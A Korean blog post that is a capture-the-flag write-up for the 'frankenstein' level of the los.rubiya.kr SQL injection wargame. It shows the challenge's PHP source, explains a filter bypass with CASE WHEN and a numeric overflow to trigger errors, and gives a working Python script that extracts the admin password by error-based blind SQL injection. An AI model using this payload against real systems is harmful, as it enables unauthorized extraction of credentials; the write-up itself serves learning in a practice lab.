웹찢남

frankenstein-writeup 본문

WEB_HACKING/los.rubiya.kr

frankenstein-writeup

harry595 2020. 1. 29. 22:15

<?php
  include "./config.php";
  login_chk();
  $db dbconnect();
  if(preg_match('/prob|_|\.|\(|\)|union/i'$_GET[pw])) exit("No Hack ~_~");
  $query "select id,pw from prob_frankenstein where id='frankenstein' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit("error");

  $_GET[pw] = addslashes($_GET[pw]);
  $query "select pw from prob_frankenstein where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("frankenstein");
  highlight_file(__FILE__);
?>

 

 

if(mysqli_error($db)) exit("error"); 를 보면 error based bsi 인걸 알 수 있는데

 

문제가 ()를 필터링 한다.. 고로 if나 지난번 처럼 coalesce 는 쓰지 못한다.. 

따라서 뒤져본 결과 case when then 구문을 사용하면 된다.

 

import re
import requests
import time

flag = ''
a='qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
session =dict(PHPSESSID="자신의 PHPSESSID")
for i in range (1,20):
        for j in a:
                        r=requests.post("https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw=1' or id='admin' and case when pw like '"+flag+str(j)+"%' then 9e307*9e307 else 0 end -- ",cookies=session)
                        if 'error' in r.text:
                                flag=flag+j
                                print("finding pw: "+flag)
                                break
print("pw "+flag)

CLEAR!!!

'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글

ouroboros-writeup  (0) 2020.01.29
phantom-writeup  (0) 2020.01.29
blue_dragon-writeup  (0) 2020.01.29
red_dragon-writeup  (0) 2020.01.29
green_dragon-writeup  (0) 2020.01.29
'WEB_HACKING/los.rubiya.kr' Related Articles more
Comments